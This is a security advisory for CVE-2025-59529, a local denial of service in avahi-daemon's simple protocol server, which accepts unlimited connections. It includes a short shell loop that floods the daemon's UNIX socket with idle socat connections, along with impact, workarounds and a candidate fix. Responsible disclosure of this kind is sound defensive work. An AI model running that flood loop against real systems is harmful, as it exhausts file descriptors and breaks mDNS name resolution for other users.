https://github.com/avahi/avahi/security/advisories/GHSA-73wf-3xmj-x82q advises:
Summary
-------
The simple protocol server ignores the documented client limit and
accepts unlimited connections, allowing for easy local DoS.
Details
-------
Although CLIENTS_MAX is defined, server_work() unconditionally
accept()s and client_new() always appends the new client and
increments n_clients. There is no check against the limit.
When client cannot be accepted as a result of maximal socket number of
avahi-daemon, it logs unconditionally error per each connection.
PoC
---
# Flood the UNIX simple-protocol socket with idle connections
for i in $(seq 1 4000); do
socat - UNIX-CONNECT:/run/avahi-daemon/socket >/dev/null 2>&1 &
done
wait
Watch avahi-daemon’s memory/FD count grow until it becomes unresponsive or
crashes, such as an endless loop of:
accept(): Too many open files
accept(): Too many open files
accept(): Too many open files
accept(): Too many open files
accept(): Too many open files
accept(): Too many open files
accept(): Too many open files
accept(): Too many open files
accept(): Too many open files
accept(): Too many open files
accept(): Too many open files
accept(): Too many open files
accept(): Too many open files
accept(): Too many open files
Impact
------
Unprivileged local users can exhaust daemon memory and file descriptors,
causing a denial of service system-wide for mDNS/DNS-SD.
Exahusting local file descriptors causes increased system load caused
by logging errors of each of request.
Overloading prevents glibc calls using nss-mdns plugins to resolve
*.local. names and link-local addresses.
Workarounds
-----------
Simple clients are offered for nss-mdns package functionality. It is
not possible to disable the unix socket /run/avahi-daemon/socket, but
resolution requests received via DBus are not affected directly. Tools
avahi-resolve, avahi-resolve-address and avahi-resolve-host-name are
not affected, they use DBus interface.
It is possible to change permissions of unix socket after avahi-daemon
is started. But avahi-daemon does not provide any configuration for it.
Additional access restrictions like SELinux can also prevent unwanted
tools to access the socket and keep resolution working for trusted users.
Fixes
-----
Candidate only: https://github.com/avahi/avahi/pull/808
Credits
-------
We would like to thank Joshua Rogers using the ZeroPath tool for
discovering and reporting the issue responsibly.
published article about it: Avahi Simple Protocol Server DoS
(CVE-2025-59529)
https://zeropath.com/blog/avahi-simple-protocol-server-dos-cve-2025-59529
Severity: Moderate, 5.5 / 10
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
CVE ID: CVE-2025-59529
Weaknesses: CWE-400
--
-Alan Coopersmith- [email protected]
Oracle Solaris Engineering - https://blogs.oracle.com/solaris
